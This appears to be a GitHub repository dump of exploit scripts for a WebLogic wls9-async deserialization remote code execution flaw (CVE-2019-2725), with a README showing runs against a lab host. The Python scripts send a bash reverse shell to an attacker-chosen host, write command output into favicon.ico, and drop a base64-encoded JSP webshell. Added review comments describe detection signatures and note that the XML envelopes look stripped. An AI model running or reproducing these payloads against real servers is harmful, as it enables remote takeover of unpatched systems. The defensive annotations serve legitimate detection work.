├── push.sh
├── command.jpg
├── python.jpg
├── burpsuite.jpg
├── webshell.jpg
├── reserve_shell.jpg
├── CNVD-C-2019-48814.mp4
├── windows-linux-webshell.jpg
├── cve-2017-10271
├── readme.md
├── async_reserve_shell.py
├── async_command_favicon.py
├── async_webshell-all.py
└── async_webshell.py
└── README.md
/push.sh:
--------------------------------------------------------------------------------
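#!/bin/sh
# Stage, commit and push the working tree in one step.
# `git add -A` replaces the bare `*` glob, which the shell expands and so
# skips dotfiles and never stages deletions; `set -e` stops at the first
# failing step so a failed commit (e.g. nothing to commit) is not followed
# by a push.  Review `git status` first: this stages everything that is not
# ignored, including stray artifacts or credentials.
set -e
git add -A
git commit -m "update"
git push -u origin HEAD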
4 |
--------------------------------------------------------------------------------
/command.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/command.jpg
--------------------------------------------------------------------------------
/python.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/python.jpg
--------------------------------------------------------------------------------
/burpsuite.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/burpsuite.jpg
--------------------------------------------------------------------------------
/webshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/webshell.jpg
--------------------------------------------------------------------------------
/reserve_shell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/reserve_shell.jpg
--------------------------------------------------------------------------------
/CNVD-C-2019-48814.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/CNVD-C-2019-48814.mp4
--------------------------------------------------------------------------------
/windows-linux-webshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CNVD-C-2019-48814/HEAD/windows-linux-webshell.jpg
--------------------------------------------------------------------------------
/cve-2017-10271/readme.md:
--------------------------------------------------------------------------------
1 | ### Only applies when the CVE-2017-10271 patch is not installed
2 | ### _async/AsyncResponseService RCE
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CNVD-C-2019-48814
2 | WebLogic wls9-async反序列化远程命令执行漏洞
3 |
4 | ### 回显poc for weblogic
5 | 
6 | 
7 |
8 | ### Patch update (Oracle Security Alert for CVE-2019-2725):
9 | ```
10 |
11 | https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
12 |
13 | ```
14 | ### 漏洞复现:
15 |
16 |
17 | ```
18 | http://10.10.20.166:7001/_async/AsyncResponseService
19 | ```
20 |
21 | ```
22 | curl -i http://10.10.20.166:7001/_async/favicon.ico
23 | ```
24 | ## CNVD-C-2019-48814 Video
25 |
26 | [CNVD-C-2019-48814.mp4](https://github.com/jas502n/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.mp4)
27 |
28 | ```
29 | python CNVD-C-2019-48814.py -u http://10.10.20.166:7001 -p 1.txt
30 |
31 | >>>>Common See:
32 |
33 | write website favicon.ico
34 | Don't Need RMI Server
35 |
36 | http://10.10.20.166:7001/_async/favicon.ico
37 |
38 | >>>>Request Success!
39 | status_code:202
40 |
41 | C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
42 | HTTP/1.1 200 OK
43 | Date: Thu, 25 Apr 2019 14:37:49 GMT
44 | Accept-Ranges: bytes
45 | Content-Length: 5
46 | Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
47 | X-Powered-By: Servlet/2.5 JSP/2.1
48 |
49 | root
50 |
51 | ```
52 | ## Use RMI
53 | 
54 |
55 | 
56 |
57 | ### CVE-2017-10271 not patched
58 |
59 | #### windows-linux-webshell
60 | ```
61 | update: 自定义webshell名字,适用于windows or linux upload webshell
62 |
63 | python async_webshell-all.py http://10.10.20.166:7001/ webshell.jsp
64 | >>>Webshell:
65 | http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
66 | ```
67 | 
68 |
69 |
70 | #### reverse_shell
71 | 
72 | #### command see
73 | 
74 | #### webshell
75 | 
76 |
77 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_reserve_shell.py:
--------------------------------------------------------------------------------
#coding=utf-8
#author: jas502n
# NOTE(review): exploit proof-of-concept from the jas502n/CNVD-C-2019-48814
# repository, kept here for detection and mitigation reference.  Python 2
# syntax (`print` is used as a statement), so it does not run under Python 3.
# It sends a single POST with Content-Type: text/xml to the WebLogic endpoint
# /_async/AsyncResponseService (wls9-async component); Oracle's alert for
# CVE-2019-2725 is linked from the repository README.  Defensive view: apply
# that patch, restrict or remove the /_async/* application, and alert on
# text/xml POSTs to this path from untrusted networks.
import sys
import requests

# Positional arguments with no validation: IndexError if any is missing.
# argv[1] is the full endpoint URL (see the example below), argv[2]/argv[3]
# are the host and port the target is told to connect back to.
url = sys.argv[1]
# "http://10.10.20.166:7001/_async/AsyncResponseService"
ip = sys.argv[2]
port = sys.argv[3]

print '''
____
| _ \
| |_) |_ _ _ __ __ _ ___ ___
| _ <| | | | '_ \ / _` / __/ __|
| |_) | |_| | |_) | (_| \__ \__ \
|____/ \__, | .__/ \__,_|___/___/
__/ | |
|___/|_| By jas502n

No Pactch For CVE-2017-10271

_async/AsyncResponseService RCE

'''

print ">>>> usage: python test.py url reserve_ip reserve_port \n"
# Request body.  In this listing only whitespace separators and the
# interpolated values survive; the surrounding XML envelope looks like it was
# stripped during extraction, so the body as shown is not a complete request.
# ip/port are substituted unquoted into a /bin/bash -c command string.
payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n bash -i >& /dev/tcp/%s/%s 0>&1\r\n \r\n \r\n \r\n \r\n" % (ip,port)
# Browser-like headers.  The spoofed X-Forwarded-For and the fixed User-Agent
# are themselves usable as detection signatures for this PoC.
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'X-Forwarded-For': "127.0.0.2",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
# Hard-coded and unrelated to the body above; requests recomputes
# Content-Length from `data`, so this value is overwritten (verify against
# the requests version in use).
'Content-Length': "963",
'cache-control': "no-cache"
}

# One POST, no timeout and no error handling: a connection failure raises
# requests.ConnectionError and the script dies with a traceback.
response = requests.request("POST", url, data=payload, headers=headers)


# The README's sample run shows `status_code:202` for an accepted request.
print "status_code:%s" % str(response.status_code)
print(response.text)
47 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_command_favicon.py:
--------------------------------------------------------------------------------
#author: jas502n
# NOTE(review): exploit proof-of-concept from the jas502n/CNVD-C-2019-48814
# repository, kept for detection and mitigation reference.  Python 2 syntax
# (`print` statements).  Posts a text/xml body to /_async/AsyncResponseService
# (WebLogic wls9-async component, CVE-2019-2725 per the Oracle alert linked
# from the README) and redirects a command's output into the deployed
# application's favicon.ico so it can be read back over HTTP.  Defensive
# view: patch per the Oracle alert; alert on text/xml POSTs to /_async/*, on
# the server process writing under servers/*/tmp/_WL_internal/*/war/, and on
# a /_async/favicon.ico whose body is not an icon (the README's sample shows a
# 5-byte body, `root`).
import requests
import sys

# url = "http://10.10.20.166:7001/_async/AsyncResponseService"


print '''
_____ _____ ______
| __ \ / ____| ____|
__ _ ___ _ _ _ __ ___ | |__) | | | |__
/ _` / __| | | | '_ \ / __| | _ /| | | __|
| (_| \__ \ |_| | | | | (__ | | \ \| |____| |____
\__,_|___/\__, |_| |_|\___| |_| \_\\_____|______|
__/ |
|___/ By jas502n

No patch for cve-2017-10271

_async/AsyncResponseService RCE
'''


# argv[1] is the base URL (scheme://host:port); it is concatenated with the
# path below without normalising a trailing slash.  No argument validation.
url = sys.argv[1]
vuln_dir ="/_async/AsyncResponseService"

vuln_url = url + vuln_dir
print "\n>>>>The Vuln Url: %s \n" % vuln_url
cmd = sys.argv[2]
# Relative path of the deployed wls9_async_response war's favicon.ico,
# resolved against the server process's working directory (presumably the
# domain directory — TODO confirm).  The `8tpkys` segment looks like a
# per-deployment temporary directory name and may differ between installs.
favicon_ico = "servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico"
# Request body.  Only whitespace separators and the interpolated values
# survive in this listing; the XML envelope appears to have been stripped
# during extraction, so the body as shown is not a complete request.
# `cmd` is substituted unquoted into a /bin/bash -c command string.
payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n %s > %s\r\n \r\n \r\n \r\n \r\n" % (cmd,favicon_ico)

# Defined but never passed to requests.request below, so the request goes
# direct (compare async_webshell-all.py, which does pass proxies=).
proxies = {
"http":"http://127.0.0.1:8080"
}

# Browser-like headers; the fixed Cookie, X-Forwarded-For and User-Agent
# values are usable as detection signatures for this PoC.
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Cookie': "sidebar_collapsed=false",
'X-Forwarded-For': "127.0.0.2",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
# Hard-coded; requests recomputes Content-Length from `data`, so this value
# is overwritten (verify against the requests version in use).
'Content-Length': "1001",
'cache-control': "no-cache"
}

# One POST, no timeout and no error handling.
response = requests.request("POST", vuln_url, data=payload, headers=headers)


# Python 2 print statement: the parenthesised string is formatted with
# `% url` before printing.  Under Python 3 this would apply `%` to print()'s
# None return value and raise TypeError.
print("%s/_async/favicon.ico") % url
print(response.text)
56 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_webshell-all.py:
--------------------------------------------------------------------------------
# NOTE(review): exploit proof-of-concept from the jas502n/CNVD-C-2019-48814
# repository, kept for detection and mitigation reference.  Python 2 syntax
# (`print` statements).  Posts a text/xml body to /_async/AsyncResponseService
# (WebLogic wls9-async component, CVE-2019-2725 per the Oracle alert linked
# from the README) to drop a file with a caller-chosen name into the
# bea_wls_internal application's war directory.  Defensive view: patch per the
# Oracle alert; alert on text/xml POSTs to /_async/*, on new files appearing
# under servers/*/tmp/_WL_internal/bea_wls_internal/*/war/, and on requests to
# /bea_wls_internal/<name>?cmd=... .
import requests
import sys
# url = "http://10.10.20.166:7001/_async/AsyncResponseService"

# argv[1] is the base URL; concatenated with the path below without
# normalising a trailing slash (the README example passes one and the
# printed result contains `//bea_wls_internal`).  No argument validation.
url = sys.argv[1]
url_dir = "/_async/AsyncResponseService"
vuln_url = url + url_dir
print vuln_url
print '''
_ _ _ _
| | | | | | |
__ _____| |__ ___| |__ ___| | |
\ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | |
\ V V / __/ |_) \__ \ | | | __/ | |
\_/\_/ \___|_.__/|___/_| |_|\___|_|_|

By jas502n

No Pactch For CVE-2017-10271

_async/AsyncResponseService RCE

webshell for linux windows
'''

# Relative path of the deployed bea_wls_internal war directory, resolved
# against the server process's working directory (presumably the domain
# directory — TODO confirm).  The `9j4dqk` segment looks like a
# per-deployment temporary directory name and may differ between installs.
write_dir="servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"
# argv[2] is the file name to create; it is appended to write_dir with no
# sanitisation.
shell_name=sys.argv[2]
shell_dir = write_dir + shell_name
print "shell_dir= %s" % shell_dir
# Every request is routed through a local intercepting proxy (cf.
# burpsuite.jpg in the repository); with nothing listening on 127.0.0.1:8080
# requests raises a ProxyError before anything reaches the target.
proxies = {"http": "http://127.0.0.1:8080"}
# Request body.  The listing jumps from line 34 to line 50 inside this
# triple-quoted literal: the XML envelope content (including the `%s` that
# `% shell_dir` fills) was dropped during extraction, so the body shown here
# is incomplete.
payload = '''

xxxx

''' % shell_dir
# print payload
# 'Cache-Control' and 'cache-control' are two distinct keys in this plain
# dict; which one requests keeps in its case-insensitive header map depends
# on Python 2 dict iteration order.  SOAPAction "" and content-type text/xml
# are usable as detection signatures alongside the request path.
headers = {
'Accept-Encoding': "gzip, deflate",
'SOAPAction': "",
'Accept': "*/*",
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Connection': "keep-alive",
'content-type': "text/xml",
# Hard-coded; requests recomputes Content-Length from `data`, so this value
# is overwritten (verify against the requests version in use).
'Content-Length': "1139",
'Cache-Control': "no-cache",
'cache-control': "no-cache"
}



# One POST through the proxy; no timeout and no error handling.
response = requests.request("POST", vuln_url, data=payload, headers=headers,proxies=proxies)
# Prints the URL at which the dropped file would be served; the query
# parameters (`pwd`, `cmd`) are consumed by the file content that is in the
# omitted lines above.
print "\n\nWebshell: \n"
print url + "/bea_wls_internal/" + shell_name + "?pwd=123&cmd=whoami"
print(response.text)
70 |
--------------------------------------------------------------------------------
/cve-2017-10271/async_webshell.py:
--------------------------------------------------------------------------------
#author: jas502n
# NOTE(review): exploit proof-of-concept from the jas502n/CNVD-C-2019-48814
# repository, kept for detection and mitigation reference.  Python 2 syntax
# (`print` statements).  Posts a text/xml body to /_async/AsyncResponseService
# (WebLogic wls9-async component, CVE-2019-2725 per the Oracle alert linked
# from the README) that writes a base64-decoded JSP page into the
# bea_wls_internal application's war directory.  Linux-only as written: the
# command string relies on /bin/bash and `base64 -d` (the README points to
# async_webshell-all.py as the Windows/Linux variant).  Defensive view: patch
# per the Oracle alert; alert on text/xml POSTs to /_async/*, on new .jsp
# files under servers/*/tmp/_WL_internal/bea_wls_internal/*/war/, and on
# requests to /bea_wls_internal/*.jsp?cmd=... .
import requests
import sys
# url = "http://10.10.20.166:7001/_async/AsyncResponseService"

# argv[1] is the base URL; concatenated with the path below without
# normalising a trailing slash.  No argument validation.
url = sys.argv[1]
url_dir = "/_async/AsyncResponseService"
vuln_url = url + url_dir
print '''
_ _ _ _
| | | | | | |
__ _____| |__ ___| |__ ___| | |
\ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | |
\ V V / __/ |_) \__ \ | | | __/ | |
\_/\_/ \___|_.__/|___/_| |_|\___|_|_|

By jas502n

No Pactch For CVE-2017-10271

_async/AsyncResponseService RCE
'''
print "\n>>>>Usage: python webshell.py url webshell.jsp\n"
print ">>>The Vuln Url: %s" % vuln_url
print
# argv[2] is the file name to create; appended to webshell_dir with no
# sanitisation.
webshell_name = sys.argv[2]
# Relative path of the deployed bea_wls_internal war directory, resolved
# against the server process's working directory (presumably the domain
# directory — TODO confirm).  The `9j4dqk` segment looks like a
# per-deployment temporary directory name and may differ between installs.
webshell_dir = "servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"
# Request body.  Only whitespace separators and the interpolated values
# survive in this listing; the XML envelope appears to have been stripped
# during extraction, so the body as shown is not a complete request.  The
# base64 blob is a JSP page (its prefix decodes to ` <%@ page import=`)
# that the final print below shows being driven by a `cmd` query parameter;
# the blob itself is a stable detection signature.
payload = " xxxx\r\n \r\n \r\n \r\n /bin/bash\r\n \r\n \r\n -c\r\n \r\n \r\n echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > %s%s\r\n \r\n \r\n \r\n \r\n" % (webshell_dir,webshell_name)
# Browser-like headers; the fixed User-Agent is usable as a detection
# signature alongside the request path and content type.
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Connection': "close",
'Content-Type': "text/xml",
# Hard-coded; requests recomputes Content-Length from `data`, so this value
# is overwritten (verify against the requests version in use).
'Content-Length': "2163",
'cache-control': "no-cache"
}

# One POST, no timeout and no error handling.
response = requests.request("POST", vuln_url, data=payload, headers=headers)
# Prints the URL at which the dropped JSP would be served with a `cmd`
# query parameter.
print "\n\nWebshell: \n"
print url + "/bea_wls_internal/" + webshell_name + "?cmd=whoami"

print(response.text)
45 |
--------------------------------------------------------------------------------